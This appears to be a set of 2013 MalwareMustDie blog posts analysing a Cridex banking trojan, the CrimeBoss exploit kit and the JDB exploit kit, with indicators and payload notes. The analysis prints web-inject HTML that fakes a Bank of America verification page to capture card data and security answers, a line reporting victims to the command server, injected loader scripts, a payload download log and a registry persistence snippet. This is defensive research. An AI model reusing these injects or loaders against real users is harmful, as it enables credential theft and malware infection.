<div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">
Personal security PIN:</font></td></div>
<td><div id="div_pininp" style =" padding:1px;">
<input type="text" class="amountfield" id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;"
name="ps_pin" maxlength=4 >
</div>
Attempt to steal Mother's Maiden Name:
<div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">
Mother's Maiden Name:</font></td></div>
<td><div id="div_pininp" style =" padding:1px;">
<input type="text" class="amountfield"
id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;"
name="mmn" ></div>
Place of birth (POB)
<div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">
Place of birth:</font></td></div>
<td><div id="div_pob" style =" padding:1px;">
<input type="text" class="amountfield" id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;"
name="pob" >
Date of birth
<div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">
Date of birth:</font></td></div>
<td><div id="div_pininp" style =" padding:1px;">
<input type="text" class="amountfield" id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;"
name="dob_mm" maxlength=2 >
<font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield" id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;"
name="dob_dd" maxlength=2 >
<font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield" id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;"
name="dob_yy" maxlength=4 >
Mother Date of birth
<div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">
Mother Date of birth:</font></td></div>
<td><div id="div_pininp" style =" padding:1px;">
<input type="text" class="amountfield" id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;"
name="mdob_mm" maxlength=2 >
<font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield" id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;"
name="mdob_dd" maxlength=2 >
<font style="font-family: Verdana;font-size: 11px;">-</font>
<input type="text" class="amountfield" id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;"
name="mdob_yy" maxlength=4 >
Also privacy related data phished like:
<option value="1">What is the name of the city where your father was born?</option>
<option value="2">What is the name of the hospital in which you were born?</option>
<option value="3">What was the name of your first pet?</option>
<option value="4">What was the first name of your first true love?</option>
<option value="6">What was the first music album that you bought?</option>
<option value="7">what is the last name of your homeroom teacher in 10th grade?</option>
<option value="8">In which city do you want to retire?</option>
<option value="9">What is the name of the city where your mother was born?</option>
<option value="10">What is of the name the city where your parents met?</option>
<option value="11">What is your youngest sibling\'s middle name?</option>
<option value="12">What is your oldest sibling\'s middle name?</option>
<option value="13">What is your spouse\'s middle name?</option>
<option value="14">What is your oldest cousin´s first name?</option>
<option value="15">What is your youngest cousin´s first name?</option>
<option value="16">Where does your nearest sibling live?</option>
<option value="17">What is the name of the school you attended in 8th grade?</option>
<option value="18">What was the last name of your 4th grade school teacher?</option>
<option value="19">What was the first name of your best friend in high school?</option>
<option value="20">What was your childhood nickname?</option>
<option value="21">What was your first love\'s first name?</option>
<option value="22">In what city did you meet your spouse?</option>
<option value="23">What was the name of your childhood hero?</option>
<option value="24">What is the name of the country you most want to visit?</option>
<option value="25">What is your maternal grandfather\'s first name?</option>
<option value="26">What is your maternal grandmother\'s first name?</option>
<option value="27">What is your paternal grandfather\'s first name?</option>
<option value="28">What is your paternal grandmother\'s first name?</option>
<option value="29">What is the first name of your first boss?</option>
<option value="30">What was the make of your first car?</option>
<option value="31">What was your major in college?</option>
<option value="32">What is your favorite Sports Team?</option>
<option value="33">As a child, what did you want to be when you grew up?</option>
<option value="34">What is your favorite candy?</option>
<option value="35">In what city or town was your first job?</option>
<option value="36">What type of dog do you have?</option>
<option value="37">What is the name of a food that you refuse to eat?</option>
This time the method used to gather url to send to the portal:
var d = adminPanelLocation + // see the CnC part..
'gate.php?bid=%USER%-1379CF37C25_9455E50D0B2D20CB&location=
'+encodeURIComponent(window.location)+'&rkey=' + Math['random']();
The bad actors are aiming Bank of America Online this time:
function secondPage() {document.title = 
"Bank of America | Online Banking | Additional verification";
jq('div[class="right-column no-print"]').hide();
jq('h1:contains("Enter your Passcode")').
text('Additional verification of your identity');
jq('p:contains("If your SiteKey is correct")').hide();
jq('p:contains("SiteKey lets you know")').
text('In order to provide you with extra security,
we occasionally need to ask for additional information
when you access your accounts online.
Please enter your card information below.');
:
<label>"Card Number"</label><div class="TL_NPI_Pass"><INPUT id=cc name=cc class=tl-private maxLength=16 size=17 type=text></div><br>
<label>"Exp. Date"</label><div class="TL_NPI_Pass">
<select name="expmm" id="expmm" style="display:inline;">
<option value="">mm</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>/
<select name="expyy" id="expyy" style="display:inline;">
<option value="">yy</option>
<option value="2012">12</option>
<option value="2013">13</option>
<option value="2014">14</option>
<option value="2015">15</option>
<option value="2016">16</option>
<option value="2017">17</option>
<option value="2018">18</option>
<option value="2019">19</option>
<option value="2020">20</option>
<option value="2021">21</option>
<option value="2022">22</option>
<option value="2023">23</option>
<option value="2024">24</option>
<option value="2025">25</option>
</select>
<label>CVV2</label><div class="TL_NPI_Pass">
<INPUT style="width:30px;" id=cvv name=cvv class=tl-private maxLength=4
size=4 "type=password">
Like previously, faking the checking of creditcard w/below logic:
function check_cc(cardnumber) {
var cardNo = cardnumber.replace(/[^0-9]/g, "");
if (cardNo.length < 15 || cardNo.length > 16) {
return false;
}
var checksum = 0;
var j = 1;
var calc;
for (i = cardNo.length - 1; i >= 0; i--) {
calc = Number(cardNo.charAt(i)) * j;
if (calc > 9) {
checksum = checksum + 1;
calc = calc - 10;
}
checksum = checksum + calc;
if (j == 1) {
j = 2;
} else {
j = 1;
}
}
if (checksum % 10 != 0) {
return false;
}
return true;
The credential information of below list of online banking was phished by connecting to the real online url for convincing victim..
jpmorgan\.com/
direct.53.com/
express.53.com/express/logon.jsp
(www\.|)cashanalyzer\.com/
business-eb\.ibanking-services\.com/
businessonline\.tdbank\.com/
businessaccess\.citibank\.citigroup.com/cbusol/signon\.do
ebanking-ch[\d]\.ubs\.com/

Malware Phishing Credential Server

This is their phishing server portal, they actually use for this infection case, see the url and compare it with the report: Wacked the way in to collect evidence of crime, first level panel: You see all of the questions asked in the phishing code are recorded, together w/passwords.Second level panel: ↑You're not only got hit once but EVERYTIME you accessed the internet to the targeted online banking sites. How ? Can't say much here, see this: You still don't believe it? PoC: It is clearly stated the current infection status:
Total bots: 85Total finished: 58Total opened: 332
Through the MalwareMustDie team work, we passed all of the data to the FBI for arrest warrant process. Let's give LAW the first chance.

Important memo after reversing & encryption of the payloads

The binaries of about.exe and the dropped KB*.exe is packed, I will not go to details of unpacking here, but if you do it right in the about.exe and KB*.exe you'll see the similarities of crypto. PoC is as per below: about.exe KB*.exe (↑green part is the crypto traces we talked about, yellow: passwords) The same pattern also detected in the traffic sent (HTTP/1.1 POST)

Network Analysis

I made a long session capturing the traffic data between my TestPC to the connected botnet, is a long session (1,500+)& will be very good if you would like to analyze the traffic of this Cridex/Fareit infection. The screenshot:Since all of the work of this infection already well-explained above, you can confirm it by seeing the PCAP capture I provide. You can download it at below Download section :-) In my test only these connection successfully established to sent credentials: And the others were HTTP rejected from the remote host:To be noted these request from Cridex showing the lookup response as per below, showing the PTR record : (for blocking & incident investigation purpose)

Conclusion - What's new then?

1. The usage of the encryption is getting deeper, they encrypted the data up to the memory level now. 2. The attempt to avoid capture also detected, the cridex was running about 3 sec & following by the KB*.exe which runs for about less than 5mins. The cmd was executed in a glimpse, and see my PCAP & file capture data to view the time/speed of this new things. All is just to prevent someone making a post like this :-) 3. More profile capture detected & more phishing sent data template seen. Thus now they have the attachment file API code in POST session

Research and Download

For the research and raising detection ratio purpose I share my samples/data:
Complete malware sample download is here -->>[HERE] Research/captures data are in here -->>[HERE]
Below is the infected url list + VT urls and URLQuery report links: (You are safe to click the links :-))
DATE/TIME FLUSHED  MD5                              SIZE    FILENAME      URLQUERY                                  VIRUS TOTAL
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2013/01/26 18:11 d0fe2ce87f933ff73f5ce0c0efadd462 422 info.htm http://urlquery.net/report.php?id=850246 https://www.virustotal.com/file/1da4c5bf69ae062b525c25538401b9fc6752b0780f4e9494431140350fc74ac9/analysis/1359196122/
2013/01/26 18:21 f1b7f17e653cdedbfc78d3e9fa2bef4d 117,752 column.php http://urlquery.net/report.php?id=842744 https://www.virustotal.com/file/59ab9f3e6a2cf40f8ce5ff37d5afdc36e68bd9c59facf72b3537adeb178fd105/analysis/1359196138/
2013/01/26 19:15 d60be18003ae07ea165d193db087957b 7,238 flash1.swf http://urlquery.net/report.php?id=850229 https://www.virustotal.com/file/f41f8102bb2d7b0e7bf97f61332e768d63fb5ccfa35693b5857c23b9e58e9622/analysis/1359196175/
2013/01/26 19:16 a5a1308ee3ca7f75fe85fe4d9a14752f 946 flash2.swf http://urlquery.net/report.php?id=850230 https://www.virustotal.com/file/3beb8ae0ce0ba1c7a8235d93aefcadded2ab7917414b70ce424836ad0ca4a721/analysis/1359196214/
2013/01/26 19:17 361f6e22e55ca3732d8cbeff43ecb1d4 21,599 infector1.pdf http://urlquery.net/report.php?id=850240 https://www.virustotal.com/file/66fb2a78aaef9b11d1e0adfaa49a81f380248230add1663cb7a75bd263b854e4/analysis/1359196230/
2013/01/26 19:17 ef4c398c0138c3e8adabcdb647b2283b 11,183 infector2.pdf http://urlquery.net/report.php?id=850236 https://www.virustotal.com/file/1fa06ce003b01fbc41b9e959f1d478f3ba56fe367f498921a757255627c67bb0/analysis/1359196247/
2013/01/26 18:23 95c06ae7b26fcbe338532bbaa1e137c4 15,420 java1.jar http://urlquery.net/report.php?id=842744 https://www.virustotal.com/file/7ef8f67e7e4b39086387570b7fd8de505684b87318e9acccef34e20e0a8122b4/analysis/1359196264/
2013/01/26 18:24 5599f12b1c2ce9c68dc629d013241273 15,592 java2.jar http://urlquery.net/report.php?id=842744 https://www.virustotal.com/file/63106ebc5076fe6e1c8195a4e5f0dfb35668c0b0334e9e7fa840f4a28ce4830c/analysis/1359196283/
2013/01/26 18:42 9fb4dd1b3e0b6002eff7e6f63a6b6d07 98,304 about.exe http://urlquery.net/report.php?id=850234 https://www.virustotal.com/file/4ac71ec87577944cfb098b379bd55e9ddc8234cd791d994f621b892d969c699f/analysis/1359193394/
2013/01/26 20:39 b152dacee9c5ca22543fe9e435177496 110,592 KB00777165.exe - https://www.virustotal.com/file/6a18c125b64f20432f8bb63ab92afcbaf9bc234968c8e8c2b472832877ee35a7/analysis/1359275410/
Stay safe friends! (PS: Thank's to a friend who contribute this nice picture!)
#MalwareMustDie!

Hulk teams up with the Malware Crusaders to smash The CrimeBoss! (infector abrahamspath.org.uk//cb.php)

$
0
0

Background


This post is made 100% by one of our dedicated friend @Hulk_Crusader
as the success story of a collaboration in fighting malware infector CrimeBoss.
Thank's for Hulk for the hard work contributing his writing in our blog!
Some of the analysis is still under-going so the details will be added regularly.

On a cold January night we find The Hulk passing time surfing the internet
when he encounters what appears to be a CrimeBoss Exploit Kit Javascript injection
on editorialconecta[.]com:


Why can't puny malware just leave Hulk alone????!!!

The script on abrahamspath.org.uk/cb.php checks if Java is enabled(slightly
sanitized with &lt):
if(navigator.javaEnabled()) 
{
document.write('
<script src="h00p://abrahamspath,org.uk//cb.php?action=jv&h=750139265">
</script>'); }
If Java is enabled you are sent via a 302 redirect to
boyssuitsonline、com/jex/index.php?setup=d 
where again a check for Java is made (slightly sanitized with &lt):
if(navigator.javaEnabled()) 

document.write('<sc' + 'ri' + 'pt src=
"h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 +
(Math.random()*999999 + 1)) + '" type="text/javascript"
charset="iso-8859-1">
</sc' + 'ri' + 'pt>');

Finally the victim is presented with the actual landing page, Landing page sample is here -->>[PASTEBIN]The landing page again checks if Java is enabled.

[NEW] Analysis of Landing Page & Jars exploit used

I analyzed how the exploit worked, and noted it down. Is a bit long so I wrote it in seperate post page-->>[HERE]What is it with these moronz?? A malware PE binary rh.exe is downloaded from patuamusic.com,br/app/ if any of the Java applets successfully exploit the victim. See: VirusTotal analysis -->>[HERE]malwr.com analysis -->>[HERE] Network analysis shows a GET request for Instal.teaz from sonhodoseu.dominiotemporario,com/fugi/ This is actually another executable and appears to be a banker trojan. See: VirusTotal analysis -->>[HERE]malwr.com analysis -->>[HERE]

Infection Scheme

Below we added the infection scheme graph: RRRRAAAAAAARGGHHHHH!!! The Hulk and Malware Crusaders smash the evil CrimeBoss Kit but is this the last we've seen of this villain?
Only time will tell. But bad guyz beware: The Hulk and The Malware Crusaders are always looking for you and you will never know when we decide to smash you!!



*) abrahamspath.org.uk, boyssuitsonline.com, patuamusic.com.br and
sonhodoseu.dominiotemporario.com are victimized sites & in some cases also,
to include infectious code to spread malware to visitors.

PoC is as per below:


And so many other infections:





Research, Sources & Samples


Samples as per above sample pic, can be received here -->>[MEDIAFIRE]
Recent Infection URL of this Exploit Kit is here -->>[HERE]
Similar analysis in Japanese --->>[HERE]
The Regex to search infection hint:


Written by: @Hulk_Crusader(main) & @unixfreaxjp (reference, analysis)
#MalwareMustDie!

Peeking at Anon JDB Exploit Kit infector (212.7.192.100/jdb/inf.php?id=xxx) with AV verdicted called "DarkKomet", but actually a NayraBOT/AryaNBot an IRC Backdoor USB Worm

$
0
0

Background


There are good investigations that make you feel good after decoding everything up,
and there are also some incompleted ones, like this story. Which is really annoying
me in the end, but I decided to release it anyway, for sharing information purpose.

Why this wasn't good? Actually is not *that* bad, I got the exploit kit script
figured well, but missing the JAR exploit infector file thus somehow the
payload (definitely malicious) won't infect my PC eventhough I tried it in many ways.
So there were a LOT of things to do & time to consume to make this post..
[NEW!] - With the help of other researchers we fully figured the
payload w/details -->>[HERE]
[NEW!] - The JAR details of this exploit kit is written in
the next post -->>[HERE]

These are the set of JDB infection at our first attempt:


It all started from infected sites with IFRAME contains "jdb/inf・php?id=" strings.
Found it UP AND ALIVE in many online sites in internet now, i.e.:
Several Facebook's posts like:

Developer Forum's posts like:

An injected code in blog sites like:

Also found it as injected code in gamer sites:

Or some code pasted in Paste posts like:

Shortly, I searched about 23 sites contains this infected code before I call it a day,
if you want to confirm this injections please check it by google for "jdb/inf・php?id="
strings.(Thank's to @Hulk_Crusader for finding the infector tips in internet)

These injected url leads to the same infector site at the below url:
212,7.192.100/jdb/inf.php?id=xxx

If we check into URLquery will show the below result:
(Thank's for @MalwareSigs for the url hint which was perfectly matched to the case!)

Discussing this matter with our team-mate @Hulk_Crusader, we found out
these are the infection of JDB Exploit Kit.
Honestly, we really have no idea what this is all about except some reference
in the internet, so after seeing Hulk's rage is increased (see below)..

.. I decided to investigate this further. Here we go:

Landing Page


Every Exploit Pack has different works, so does this one. And this one has its
unique ways. I accessed the two below confirmed infectors from URLQuery: (thanks Hulk!)
212,7.192.100/jdb/inf,php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
212,7.192.100/jdb/inf,php?id=454897430d071f42dc980fcfe917c75a
And they worked in different way, even the request was sent by a simple defined static conditions: "With Java and without Java" While accessing the 1st url, with or without Java I received below script response: And I have response of landing page script if accessing the 2nd URL "with Java": ↑This is how we got in touch with the landing page of JDB Exploit Kit. So how is it goes if we got infected? I tried to infect my self by using the landing page, and it goes like this: I tried to connect to one of URL above & having a pop up asking for Adobe Flash update: In the Java console I found the access for java classes which was executed as per logged below: You maybe have different response depends on your browser, but If we use the latest IE + Java in the browser the response might look like pic below: Back to the code, in either the 1st or 2nd accessed URL above this javascript was executed: If we press the OK button the malware file is starting to be downloaded. Let's make sure that the url is still valid...
--2013-01-30 15:45:05--  
h00p://212,7.192.100/jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a
seconds 0.00, Connecting to 212,7.192.100:80... seconds 0.00, connected.
:
GET /jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a HTTP/1.0
Referer: (Put the URL of infected site here..)
User-Agent: MalwareMustDie rocks JDB now!
Host: "212,7.192.100"
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: "Wed, 30 Jan 2013 06:45:52 GMT"
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename="Adobe-Flash_WIN.exe"
Connection: close
Content-Type: application/octet-stream
:
200 OK
Length: "unspecified [application/octet-stream]"
Saving to: "Adobe-Flash_WIN.exe"
2013-01-30 15:45:08 (99.0 KB/s) - "Adobe-Flash_WIN.exe" saved [83968]
And this is the actual file looks like: ↑What was popped up as Adobe Updater looks like "Image Extractor" now :-) The point of this section is both Java or not Java supported browser is being targeted by JDB exploit kit. Let's move on. We'll go back to this payload analysis later.. Now let's see the detail code in the landing page. JDB uses the PluginDetect-base java script, a well-customized one. I hardly recognize the base if I didn't look at it very well. In a glimpse you'll probably will think that you are seeing Google page source code.. I'll explain to you why. We can see the PluginDetect typical code traces like below:
"The usage of the alphabetical values of PluginDetect.."
// You'll se this very much scattered in codes..
(function () {
var b, c, d, e;
function g(a, f) {...
:

"The way of PluginDtect Define the DOM/XML Component of IE:"

(function () {
var a, b = "1";
if (document && document.getElementById) if ("undefined" != typeof XMLHttpRequest) b = "2";
else if ("undefined" != typeof ActiveXObject) {
var c, d, e = ["MSXML2.XMLHTTP.6.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP"];
for (c = 0; d = e[c++];) try {
new ActiveXObject(d), b = "2"
} catch (f)...

(etc..etc..)
JDB EK scattered the infector script between CSS & HTML like the below structure, PS: as per mentioned, it required Java installed for folowing this scheme..
"Infector script came up first..."
<script ..
setTimeout("alert('Adobe Flash must be updated to view this, please install the latest version!'...;
setTimeout("location.href = ...

"Continued by the java applet..."
<applet width='0px' height='0px'
code="GAME,class" archive="data・php?id=xxxx....
"
"HTML starts, following by a redirector script code of faking Google page.."
<html itemscope="itemscope" itemtype="http://schema.org/WebPage">
<head>
<meta itemprop="image" content="/images/google_favicon_128.png">
<title>Google</title>
<script>
(function () {
window.google = {
kEI: "xcrhUNW6MpHBswbloYHoBA",
getEI: function (a) {
for (var b; a &&(!a.getAttribute || !(b = a.getAttribute("eid")));) a = a.parentNode;
return b || google.kEI

"Some obfuscation detected here.."
kEXPI: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
kCSI: {
e: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
ei: "xcrhUNW6MpHBswbloYHoBA"
:
"..Following by PluginDetct customized.. with all stuffs -
was related/linked with the Google...
no wonder many automation got fooled by this
and think it was google redirection page.."

<script> (
 function () {
try {
var e = !0,
h = null,
j = !1;
var aa = function (a, b, c, d) {
d = d || {};
d._sn = ["cfg", b, c].join(".");
window.gbar.logger.ml(a, d)
};
var m = window.gbar = window.gbar || {},
  p = window.gbar.i = window.gbar.i || {}, ba;
       :
The full "neutralized" landing script is-->>[HERE]Please see the code in the pastebin well, and you'll see many Google API & calls used. Conclusion is, you should be aware of which are the real Google page & which are not if you meet this kind of exploit kit. What looks like Google maybe is not real Google. PS: This "faking" scheme actually can be implemented in many portals or SNS sites too.. So let&s be aware of this trend. Below is the snapshot of fake Google page generated by this landing page: In additional,I studied other case which were reported in URLquery here -->>[URLquery] too. ↑In that case user were redirected perfectly to the Google portal (http://www.google.no/), with also generated javascript eval() obfuscated hex values (pls expand the bottom parts) I tried to decode it in some ways it's meaningful.. and still not making any sense..

JAR Infector

It has the JAR infector as per above landing page mentioned "class.class" or "GAME.class" , which are referred to the download url as per mentioned applet tag mentioned above, (at the beginning of the landing page script) Nd it pointed to the part below:
GAME.class' archive='data.php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
Note: Due to some technicalities in fetching this file, I will add the JAR analysis later.. The file is there. But always returning 0 byte, as per logged below:
HTTP/1.1 200 OK
Date: Wed, 30 Jan 2013 13:39:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename=0e60198f77a4c5f78f2d8fb8fa7e5776.jar
"Content-Length: 0 Connection: close
Content-Type: application/octet-stream
:
200 OK
Length: 0 [application/octet-stream]
The JAR adventure of this Anon JDB EK is longer than I thought, so it will write it in the next post, stay tune! [NEW] The JAR & its payload report is here-->>[HERE]

Payload

OK, we got one payload in this first attempt. And in our next post you can see much more payloads dropped from the JARs file, let's continue w/this payload: Looks like already uploaded into internet 5(five)hours ago, AV products are detecting this as a DarkKomet trojan, a backdoor downloader. Below is Virus Total Scan Details:
SHA1:      e5d2da5b3546f24e1510f8ae53e0d05ce342c806
MD5: 10c8559523f8f5787daa3dc8e47b64e1
File size: 82.0 KB ( 83968 bytes )
File name: Adobe-Flash_WIN.exe
File type: Win32 EXE
Tags: peexe
Detection: 15 / 46
Analysis date: 2013-01-30 06:42:34 UTC ( 5 hours, 40 minutes ago )
URL: https://www.virustotal.com/latest-scan/90359af6d9dafee904552f17318cee1c26d7bd68db30fae362b69c4693d57aa1

"Malware name:"
F-Secure : Gen:Variant.Zusy.33769
DrWeb : BackDoor.HostBooter.3
GData : Gen:Variant.Zusy.33769
AhnLab-V3 : Backdoor/Win32.DarkKomet
ESET-NOD32 : a variant of MSIL/Injector.AZM
VBA32 : TScope.Trojan.MSIL.gen
TrendMicro-HouseCall : TROJ_GEN.F4AHZAM
Avast : Win32:Malware-gen
BitDefender : Gen:Variant.Zusy.33769
Agnitum : Trojan.Scarsi!W0yI8SvDe54
Malwarebytes : Trojan.Downloader.ED
Ikarus : Backdoor.Win32.DarkKomet
Fortinet : MSIL/Dropper.CSS!tr
AVG : Dropper.Generic7.ATKY
Panda : Trj/Dtcontx.A
OK, AV signature Said DarkKomet, so let's take a look closer... Remember you should see yourself it to understand what it really is. The binary looks like this:
Compilation timedatestamp: 2013-01-18 21:26:40
Compiled by: Microsoft Visual Basic .NET
Target machine: 0x14C (Intel 386)
Entry Point at: 0x64ee
Virtual Address is 0x4080ee
Sections:
.text 0x2000 0x60f4 25088 // no packer detected
.sdata 0xa000 0xb0 512
.rsrc 0xc000 0xdd00 56832
.reloc 0x1a000 0xc 512
"HEX snips.."
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 10 BE F9 50 00 00 00 00 PE..L......P....
0090 00 00 00 00 E0 00 02 01 0B 01 0B 00 00 62 00 00 .............b..
00A0 00 E2 00 00 00 00 00 00 EE 80 00 00 00 20 00 00 ............. ..
00B0 00 A0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 ......@.. ......
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................
00D0 00 C0 01 00 00 04 00 00 00 00 00 00 02 00 40 85 ..............@.
00E0 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 ................
00F0 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................
0100 A0 80 00 00 4B 00 00 00 00 C0 00 00 00 DD 00 00 ....K...........
Interesting findings in binary;
A compilation trace...
0x006634 C:\Users\USER\Documents\Mallette magique\stubs\
Image Extract v1.3\Image Extract v1.3
\obj\x86\Release\Image Extract v1.3.pdb
Looks it drops this file...
0x00509D   c:\MyTest.txt
The binary contains these "interesting" words :-)
0x0050C7   Blues           0x00561D   Folk/Rock         0x005369   Meditative           0x005871   Tango
0x0050D3 Classic Rock 0x005631 National Folk 0x00537F Instrumental Pop 0x00587D Samba
0x0050ED Country 0x00564D Swing 0x0053A1 Instrumental Rock 0x005889 Folklore
0x0050FD Dance 0x005659 Bebob 0x0053C5 Ethnic 0x00589B Ballad
0x005109 Disco 0x005665 Latin 0x0053D3 Gothic 0x0058A9 Power Ballad
0x00511F Grunge 0x005671 Revival 0x0053E1 Darkwave 0x0058C3 Rhythmic Soul
0x00514B Metal 0x005681 Celtic 0x005419 Electronic 0x0058DF Freestyle
0x005157 New Age 0x00568F Bluegrass 0x005443 Eurodance 0x0058FD Punk Rock
0x005167 Oldies 0x0056A3 Avantgarde 0x005457 Dream 0x005911 Drum Solo
0x005175 Other 0x0056B9 Gothic Rock 0x005463 Southern Rock 0x005925 A Cappella
0x005199 Reggae 0x0056D1 Progressive Rock 0x00547F Comedy 0x005955 Dance Hall
0x0051B1 Techno 0x0056F3 Psychedelic Rock 0x005497 Gangsta 0x005973 Drum & Bass
0x0051BF Industrial 0x005715 Symphonic Rock 0x0054A7 Top 40 0x0059A5 Hardcore
0x0051D5 Alternative 0x005733 Slow Rock 0x0054B5 Christian Rap 0x0059B7 Terror
0x0051F5 Death Metal 0x005747 Big Band 0x0054D1 Pop/Funk 0x0059C5 Indie
0x00520D Pranks 0x005759 Chorus 0x0054E3 Jungle 0x0059D1 BritPop
0x00521B Soundtrack 0x005767 Easy Listening 0x0054F1 Native American 0x0059E1 Negerpunk
0x00524B Ambient 0x005785 Acoustic 0x005511 Cabaret 0x0059F5 Polsk Punk
0x00526F Vocal 0x005797 Humour 0x005521 New Wave 0x005A15 Christian Gangsta Rap
0x00527B Jazz Funk 0x0057A5 Speech 0x005533 Psychadelic 0x005A41 Heavy Metal
0x00528F Fusion 0x0057B3 Chanson 0x005555 Showtunes 0x005A59 Black Metal
0x00529D Trance 0x0057C3 Opera 0x005569 Trailer 0x005A71 Crossover
0x0052AB Classical 0x0057CF Chamber Music 0x005589 Tribal 0x005A85 Contemporary Christian
0x0052BF Instrumental 0x0057EB Sonata 0x005597 Acid Punk 0x005AB3 Christian Rock
0x0052E3 House 0x0057F9 Symphony 0x0055AB Acid Jazz 0x005AD1 Merengue
0x0052F9 Sound Clip 0x00580B Booty Bass 0x0055BF Polka 0x005AE3 Salsa
0x00530F Gospel 0x005821 Primus 0x0055CB Retro 0x005AEF Thrash Metal
0x00531D Noise 0x00582F Porn Groove 0x0055D7 Musical 0x005B09 Anime
0x005329 AlternRock 0x005847 Satire 0x0055E7 Rock & Roll 0x005B1F Synthpop
0x00535D Space 0x005855 Slow Jam 0x0055FF Hard Rock
If it is a DarkKomet trojan, it supposed opening backdoor & making calls to the mothership. So I wonder what exactly *this* DarKomet will do... Maybe if we lucky we can see the location of the mothership too. Well, I run this payload like below snapshot to see its malicious acts: As per expected, it dropped the txt file in root folder, so far so good.. But too bad,↑the file is containing zero byte.. I run and check it here and there, like: Well, it run. Yes. but no malicious act detected in my test :-( It runs, for say 10 seconds then exit 0. It doesn't actually opening any network socket for backdoor nor making internet connection.. Strange.. Only in the memory I saw a lot of suspicious calls like:
0x4DC446      http\shell\open\command
0x4DE1CE http://
0x30E16E WWW-AuthenticateHTTP/
0x2DA392 HTTP/1.1 200 OK
0x2D2A5A HttpListenerContext#
0x2D2DDA httpListener#
0x2D2E76 httpContext#
0x2D2F2E HTTP Method:
0x383E72 HTTP_SEND_REQUEST_FLAG_MORE_DATA
0x383E96 HTTP_RECEIVE_REQUEST_FLAG_COPY_BODY
0x383EBA HTTP_SEND_RESPONSE_FLAG_MORE_DATA
0x383EDE HTTP_SEND_RESPONSE_FLAG_RAW_HEADER
↑So it supposed to start connecting internet but it doesn't.. no PCAP. At that time, the suspicious traces I found is at the memory dump, and some operation in IE cache in windows' registry.. it's really annoying. [NEW!] After a while I was contacted by our researcher friend: Matt of @undeadsecurity , which explained he got the PCAP. you can see Matt's post here -->>[Link](thank's for the good work!-->@undeadsecurity) Matt's recorded below traffic: (the pic below belongs to Matt/@undeadsecurity) Which we can eliminate the broadcast address of 10.74.4.255 and also eliminate AKAMAI network from the list, what's left in the traffic (in PCAP)is the malware communication: ↑You see DNS query to adultsirc.no-ip.org + some connect tries to IRC 6667 port. At the time I saw this I was decided to drop the verdict of AV products which saying about Trojan DarkKomet etc etc (which you should too!). Still, I couldn't make it run it in my system so I took into Matt's report further, and it was mentioned this IMPORTANT trails:
on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "jeQodSivaa"
